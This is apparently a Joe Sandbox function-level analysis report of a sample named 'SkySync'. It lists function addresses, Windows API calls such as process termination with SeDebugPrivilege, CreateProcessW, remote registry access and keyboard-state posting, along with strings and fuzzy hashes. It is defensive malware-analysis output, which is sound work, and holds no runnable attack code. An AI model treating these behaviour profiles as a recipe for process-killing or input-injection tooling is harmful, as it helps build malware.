Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 34f3ece2400c23eb201a1d6d2fcf2308c99c20bd869a807535f740eb83935437
Instruction ID: c82ab270e3cda0ed3532262254b8d1e1b139472a7b35054bea47289e4fe3b18f
Opcode Fuzzy Hash: 34f3ece2400c23eb201a1d6d2fcf2308c99c20bd869a807535f740eb83935437
Instruction Fuzzy Hash: 6101CDB5650344BFE720AFA5DC4EF6B7BACEB89711F004411FA05DB1A2CA749815CB30

Function 00ABA3F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 151fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00B553BA,00000104,?,00000001,00AB1003), ref: 00ABA48A
GetStdHandle.KERNEL32(000000F4,?,00000001,00AB1003), ref: 00ABA544
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00ABA593

Strings

Runtime Error!Program: , xrefs: 00ABA458
Microsoft Visual C++ Runtime Library, xrefs: 00ABA532
..., xrefs: 00ABA4D1
<program name unknown>, xrefs: 00ABA499

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 3e592a70948a205585a8a941a18155e2b76663c8ee009cd94cbd0d5499222654
Instruction ID: 895674e94b333c084e717d727ec20400928fc990df88b453bf3593fae6d72323
Opcode Fuzzy Hash: 3e592a70948a205585a8a941a18155e2b76663c8ee009cd94cbd0d5499222654
Instruction Fuzzy Hash: 47416971A40B15AAD73163789D16FEE339CAB34752F0002B9FD0AA61D3FEA08F044292

Function 00B0F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00AF4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00AF416D
Part of subcall function 00AF4148: Process32FirstW.KERNEL32(00000000,?), ref: 00AF417B
Part of subcall function 00AF4148: CloseHandle.KERNELBASE(00000000), ref: 00AF4245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B0F08D
GetLastError.KERNEL32 ref: 00B0F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B0F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B0F14C
GetLastError.KERNEL32(00000000), ref: 00B0F157
CloseHandle.KERNEL32(00000000), ref: 00B0F18C

Strings

SeDebugPrivilege, xrefs: 00B0F0AB

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 78035c080caf8a0847ecd00c64022225433c9193e7a8e1ab1b14caa908882c46
Instruction ID: 91fc4577db4657ac29a5846005ea6e3352025855bacd7519b5adedc66d38498f
Opcode Fuzzy Hash: 78035c080caf8a0847ecd00c64022225433c9193e7a8e1ab1b14caa908882c46
Instruction Fuzzy Hash: 3641CD313042029FDB25EF24CD95F7EBBE1AF88714F048099F9029B2D2DB74A806CB85

Function 00B0FD7D Relevance: 12.4, APIs: 8, Instructions: 386processCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B0FF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B0FF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B0FF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B0FFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B10133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B10165
CloseHandle.KERNEL32(?), ref: 00B10194
CloseHandle.KERNEL32(?), ref: 00B1020B

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess
String ID:
API String ID: 2947177986-0
Opcode ID: 843474464bb03bc79794f70916db4b516f11ebd8143405f8c0127fcf76e42e9c
Instruction ID: 81f04d5e9aaed85a216ca57f16ae5dc990f952ef1dc0c99c9d7f0127a464207c
Opcode Fuzzy Hash: 843474464bb03bc79794f70916db4b516f11ebd8143405f8c0127fcf76e42e9c
Instruction Fuzzy Hash: BCE1B231204301DFCB24EF24C991B6ABBE5EF89314F14856DF9899B2A2DB71DC81CB52

Function 00AF34DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00AF357C

Strings

info, xrefs: 00AF351D
stop, xrefs: 00AF354D
blank, xrefs: 00AF34FE
question, xrefs: 00AF3535
warning, xrefs: 00AF3565

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 66f5f765691f4d1139766861d4bac0b8e0d58b78cb6ae2fc25235ec3a252e076
Instruction ID: 764cd6588f8a8b89a484ccc150127a8257bdbf816d196df001140275b171ff6d
Opcode Fuzzy Hash: 66f5f765691f4d1139766861d4bac0b8e0d58b78cb6ae2fc25235ec3a252e076
Instruction Fuzzy Hash: 7311207364834EBEEF005B98EC92CBA77ECDF45760B10005AFB0066182E774AF4456A0

Function 00AF7F4B Relevance: 12.3, APIs: 8, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00AF8027

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: f0d8d79ff11e2df9cc8f4318da5af3cc516d003defd1820a43bf4e5cb492624d
Instruction ID: abf19d0d9fe86f38a91f45e472f9d348b1e3581b9926fef8efe9f03c32213909
Opcode Fuzzy Hash: f0d8d79ff11e2df9cc8f4318da5af3cc516d003defd1820a43bf4e5cb492624d
Instruction Fuzzy Hash: 62B18C71A0420E9FDB10DFD8D885BBEB7B5EF09321F244529E711E7251DB78A942CBA0

Function 00B1DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A929E2: GetWindowLongW.USER32(?,000000EB), ref: 00A929F3

GetSystemMetrics.USER32(0000000F), ref: 00B1DB42
GetSystemMetrics.USER32(0000000F), ref: 00B1DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B1DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B1DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B1DDDC
ShowWindow.USER32(00000003,00000000), ref: 00B1DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 00B1DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 00B1DE43

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: c5a9fb4d18ef6eb1b236eae99a7a5eecc0ac76fdd8bc06315b9630ad6f402a7c
Instruction ID: a2e57d2eb29e26c9ead02bff64ac2fe00d9510694e1efc6dd90dee355d292496
Opcode Fuzzy Hash: c5a9fb4d18ef6eb1b236eae99a7a5eecc0ac76fdd8bc06315b9630ad6f402a7c
Instruction Fuzzy Hash: AAB16632600215ABDF14CF69C9857EA7BF1FB08701F4881A9ED489F295DB74A990CBA0

Function 00B10371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1040D,?,?), ref: 00B11491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B1044E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 9ad02dd593ce31c108a1d76692c642ed3c35cb089b43e56f48139f707a766a08
Instruction ID: 872d2830b2dc04749d2d26f1cfc85a37054d6d5e7d8c15013896b2289b25887a
Opcode Fuzzy Hash: 9ad02dd593ce31c108a1d76692c642ed3c35cb089b43e56f48139f707a766a08
Instruction Fuzzy Hash: 30A19A70204201AFCB10EF64C881FAEB7E5EF85314F54895DF5968B2A2DB75E985CF42

Function 00A92E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ACC508,00000004,00000000,00000000,00000000), ref: 00A92E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ACC508,00000004,00000000,00000000,00000000,000000FF), ref: 00A92EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ACC508,00000004,00000000,00000000,00000000), ref: 00ACC55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ACC508,00000004,00000000,00000000,00000000), ref: 00ACC5C7

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: a45468b5c42c957fbbf9969a96645ff5473859c6c7d650b93f16765c8c17abf0
Instruction ID: 8ff32737b440df4d192639719858685bda3e706c699dda99c4df2effcdac6230
Opcode Fuzzy Hash: a45468b5c42c957fbbf9969a96645ff5473859c6c7d650b93f16765c8c17abf0
Instruction Fuzzy Hash: CA410834718784BADF359B299CC8B7A7FE2AF85310F25845DE44B479A1CB71B881DB10

Function 00B167F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B16810
GetDC.USER32(00000000), ref: 00B16818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B16823
ReleaseDC.USER32(00000000,00000000), ref: 00B1682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B1686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B1687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B1964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00B168B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B168D6

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: f791b045da56008cc5664b46f6c4ca96aa3db030e4796d9119b117c6628d81a0
Instruction ID: 7d05708fab2926c3e1511773e147bafcf9938e7861eaec5edc480243831b012f
Opcode Fuzzy Hash: f791b045da56008cc5664b46f6c4ca96aa3db030e4796d9119b117c6628d81a0
Instruction Fuzzy Hash: BC316D72111214BFEB219F14CC4AFEB3BA9EB49761F044055FE089A292CA759C52CB74

Function 00B0A20D Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00B0A265
NULL Pointer assignment, xrefs: 00B0A28E, 00B0A5B2

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 3eaa88e0390db90e8d0a437b00c5ccdc8e6128658be1dd288069c5495da30108
Instruction ID: e516a05c9338dedd75e9f181ec260ef42f41a6aa763f9a2bfa2f79d4b395647f
Opcode Fuzzy Hash: 3eaa88e0390db90e8d0a437b00c5ccdc8e6128658be1dd288069c5495da30108
Instruction Fuzzy Hash: D8C1A371A0031A9FDF10DFA8D885AAEBBF5FF58310F1488A9E905AB281E770DD45CB51

Function 00B097FD Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B09922
VariantInit.OLEAUT32(?), ref: 00B09A23
VariantClear.OLEAUT32(?), ref: 00B09A2D
VariantClear.OLEAUT32(?), ref: 00B09A8A

Strings

Null Object assignment in FOR..IN loop, xrefs: 00B098B2, 00B099E0, 00B09A98
Incorrect Object type in FOR..IN loop, xrefs: 00B09A06

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: aeabc09314ffd1687cdc03bf7136328bb9489759a62cb837b7b10df1e84032a4
Instruction ID: 15c601a6383aaa88ec0168f16fcb6d71ad28befc7e82dcf4eac7963f23beb455
Opcode Fuzzy Hash: aeabc09314ffd1687cdc03bf7136328bb9489759a62cb837b7b10df1e84032a4
Instruction Fuzzy Hash: 0C919E31A00219ABDF24DFA5C888FAEBBF8EF45710F10859DF515AB292D7709945CFA0

Function 00A91800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5711f45d55681254cc2814f18305b1af086d32943b11c4d410c0270889c3940
Instruction ID: d15e26c840b2deb78151f97c49ed64c8fbd868b09fc328c841ce8811fe0567cf
Opcode Fuzzy Hash: c5711f45d55681254cc2814f18305b1af086d32943b11c4d410c0270889c3940
Instruction Fuzzy Hash: DD715D30A0010AEFDF149F98CC89EAE7BB5FF85315F148159F925AB251C7309A52DFA0

Function 00B1B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(0103E3C8), ref: 00B1BA5D
IsWindowEnabled.USER32(0103E3C8), ref: 00B1BA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00B1BB4D
SendMessageW.USER32(0103E3C8,000000B0,?,?), ref: 00B1BB84
IsDlgButtonChecked.USER32(?,?), ref: 00B1BBC1
GetWindowLongW.USER32(0103E3C8,000000EC), ref: 00B1BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B1BBFB

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 7d2ac9e9906975fe6b888653413de8d8e82388606a1cb05e1d9f0ed4483f3480
Instruction ID: 2c69471b9ccebd5f927930995f19132c50967964e318b0727e4ac39cd6122381
Opcode Fuzzy Hash: 7d2ac9e9906975fe6b888653413de8d8e82388606a1cb05e1d9f0ed4483f3480
Instruction Fuzzy Hash: F7719B34618204AFDB259F54C8D4FFABBE9EF49300F9440D9E986972A1CF31AD91DB60

Function 00AF174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00AF178B
GetKeyboardState.USER32(?), ref: 00AF17A0
SetKeyboardState.USER32(?), ref: 00AF1801
PostMessageW.USER32(?,00000101,00000010,?), ref: 00AF182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 00AF184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00AF1894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AF18B7

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e3c0b1f6104390a11e1bffbd7d3ece201e0ca4d7a79132bf846d6f57c76c2d5d
Instruction ID: 105e28c3afa6c762abc195ea117caa0aa9122a84fb9b7398612e8aba1e7bc6ca
Opcode Fuzzy Hash: e3c0b1f6104390a11e1bffbd7d3ece201e0ca4d7a79132bf846d6f57c76c2d5d
Instruction Fuzzy Hash: 5751F5609087D9BEFB3693B4CC55BB6BEE95B06340F084589F2D9468C3D2D8DC84DB90

Function 00AF1565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00AF15A4
GetKeyboardState.USER32(?), ref: 00AF15B9
SetKeyboardState.USER32(?), ref: 00AF161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AF1646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AF1663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AF16A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AF16C8

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ced424ad3ede2e9bf29e81195d5bc8b54ace9fefaed40a8a661eaeab72c297cc
Instruction ID: 9331575ad771a650448cfe7be35522975faee1455f5fc49b085c75e2e80ce3ce
Opcode Fuzzy Hash: ced424ad3ede2e9bf29e81195d5bc8b54ace9fefaed40a8a661eaeab72c297cc
Instruction Fuzzy Hash: 2A512AA05047D9BDFB3393A4CC45B7ABEA95F06300F0C4489F2D9968C3D694EC84E750

Function 00B173A5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B17449
SendMessageW.USER32(?,00001036,00000000,?), ref: 00B1745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B17477
SendMessageW.USER32(?,00001057,00000000,?), ref: 00B174E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B17517

Strings

SysListView32, xrefs: 00B1741B

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysListView32
API String ID: 2326795674-78025650
Opcode ID: 569d6f8c0ecf7d03914b2e29914e89750f1ddb82816b54f6e0ee268baf499ccb
Instruction ID: 8d00e91b40970ed2d3e3176e6e9565cc34727e7805867bc8db09db29ed7a4527
Opcode Fuzzy Hash: 569d6f8c0ecf7d03914b2e29914e89750f1ddb82816b54f6e0ee268baf499ccb
Instruction Fuzzy Hash: 3F41B370644308AFDB219F64DC85BEE7BF8EF08350F5044AAF984A7292DA719D858B50

Function 00B11602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B11631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B1165B
FreeLibrary.KERNEL32(00000000), ref: 00B11712

Part of subcall function 00B11602: RegCloseKey.ADVAPI32(?), ref: 00B11678
Part of subcall function 00B11602: FreeLibrary.KERNEL32(?), ref: 00B116CA
Part of subcall function 00B11602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B116ED

